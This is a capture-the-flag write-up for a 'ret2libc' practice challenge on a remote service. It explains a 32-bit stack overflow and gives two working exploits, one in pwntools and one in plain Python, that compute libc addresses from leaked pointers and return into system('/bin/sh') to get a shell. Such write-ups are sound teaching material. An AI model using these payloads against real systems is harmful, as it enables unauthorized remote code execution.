ret2libc

Description

nc bamboofox.cs.nctu.edu.tw 11002

ret2libc practice


32-bit dynamically linked ELF with NX enabled, so shellcode on the stack is out and the shell has to come from libc.

The program has a stack overflow, and it even prints the addresses of "/bin/sh" and puts before reading input, so no separate leak stage is needed: subtract the puts offset to get the libc base, add the system offset, and return into system("/bin/sh").

The exploit:

from pwn import *

context.arch = 'i386'
context.os = 'linux'

#io = process('./ret2libc')
io = remote('bamboofox.cs.nctu.edu.tw', 11002)
elf = ELF('./ret2libc')
#libc = elf.libc
libc = ELF('./libc.so.6')   # libc shipped with the challenge; the offsets below come from it

# The program leaks both addresses before reading input, so no info-leak stage is needed
io.recvuntil('The address of "/bin/sh" is ')
binsh_addr = int(io.recvline().strip(), 16)
info('binsh_addr: ' + hex(binsh_addr))
io.recvuntil('The address of function "puts" is ')
puts_addr = int(io.recvline().strip(), 16)
info('puts_addr: ' + hex(puts_addr))
# leaked puts minus its offset inside libc gives the load base (should end in 000)
libc_base = puts_addr - libc.symbols['puts']
info('libc_base: ' + hex(libc_base))
system_addr = libc_base + libc.symbols['system']
info('system_addr: ' + hex(system_addr))

# 32-bit cdecl frame: 32 bytes of padding up to the saved return address,
# then system(), a fake return address, and the "/bin/sh" pointer as the argument
payload = b'a' * 32 + p32(system_addr) + p32(0) + p32(binsh_addr)
io.sendline(payload)

io.interactive()
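As an added example (mine, not the post author's exploit), the same parse-leak, compute-base, build-frame steps in plain Python without pwntools, plus the two checks a practitioner wants before firing the payload: the recovered libc base must be page aligned (otherwise the libc offsets belong to a different libc build), and the finished payload must not contain a newline byte if the program reads the line with gets()/fgets(). The banner text and the libc symbol offsets are constructed placeholders, not values from the real service or its libc; the 32-byte padding is the one the post's exploit uses.

```python
import re
import struct

# Constructed sample of the challenge banner, standing in for what the remote
# service prints. The addresses are made up for the example.
SAMPLE_BANNER = (
    b'The address of "/bin/sh" is 0xf7f5b3cf\n'
    b'The address of function "puts" is 0xf7e22140\n'
)

# Assumed libc symbol offsets (what ELF('./libc.so.6').symbols would give).
# Placeholders: take the real ones from the libc shipped with the challenge.
LIBC_SYMBOLS = {
    'puts': 0x5f140,
    'system': 0x3a940,
}

# Distance from the overflowed buffer to the saved return address, as on the page.
PADDING = 32


def parse_leaks(banner):
    """Pull the two leaked addresses out of the banner text."""
    m_sh = re.search(rb'The address of "/bin/sh" is (0x[0-9a-fA-F]+)', banner)
    m_puts = re.search(rb'The address of function "puts" is (0x[0-9a-fA-F]+)', banner)
    if not (m_sh and m_puts):
        raise ValueError('leak lines not found in banner')
    return int(m_sh.group(1), 16), int(m_puts.group(1), 16)


def libc_base_from_puts(puts_addr, symbols=LIBC_SYMBOLS):
    """libc base = leaked puts - puts offset. libc is mmapped page aligned,
    so a base that is not a multiple of 0x1000 means the offsets are wrong."""
    base = puts_addr - symbols['puts']
    if base & 0xfff:
        raise ValueError('libc base 0x%x is not page aligned: wrong libc?' % base)
    return base


def build_ret2libc_payload(system_addr, binsh_addr, padding=PADDING, fake_ret=0):
    """32-bit cdecl frame: overwrite the saved return address with system(),
    follow it with a fake return address, then system's first argument."""
    payload = b'a' * padding
    payload += struct.pack('<I', system_addr)   # where ret jumps
    payload += struct.pack('<I', fake_ret)      # what system() returns to
    payload += struct.pack('<I', binsh_addr)    # argv for system()
    return payload


def check_badchars(payload, bad=b'\n'):
    """Return offsets of bytes that would truncate a gets()/fgets() read."""
    return [i for i, b in enumerate(payload) if b in bad]


def exploit_payload(banner, symbols=LIBC_SYMBOLS):
    """Full pipeline: returns (payload, libc_base, system_addr)."""
    binsh_addr, puts_addr = parse_leaks(banner)
    base = libc_base_from_puts(puts_addr, symbols)
    system_addr = base + symbols['system']
    payload = build_ret2libc_payload(system_addr, binsh_addr)
    bad = check_badchars(payload)
    if bad:
        raise ValueError('payload contains newline at offsets %r' % bad)
    return payload, base, system_addr


if __name__ == '__main__':
    payload, base, system_addr = exploit_payload(SAMPLE_BANNER)
    print('libc_base: 0x%x  system: 0x%x' % (base, system_addr))
    print('payload (%d bytes): %s' % (len(payload), payload.hex()))
```

Against the real service the payload returned by exploit_payload() is what gets sent with sendline(); the page-alignment check catches the most common failure here, which is computing offsets against the wrong libc.so.6.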


posted @ 2021-09-02 15:14  hktk1643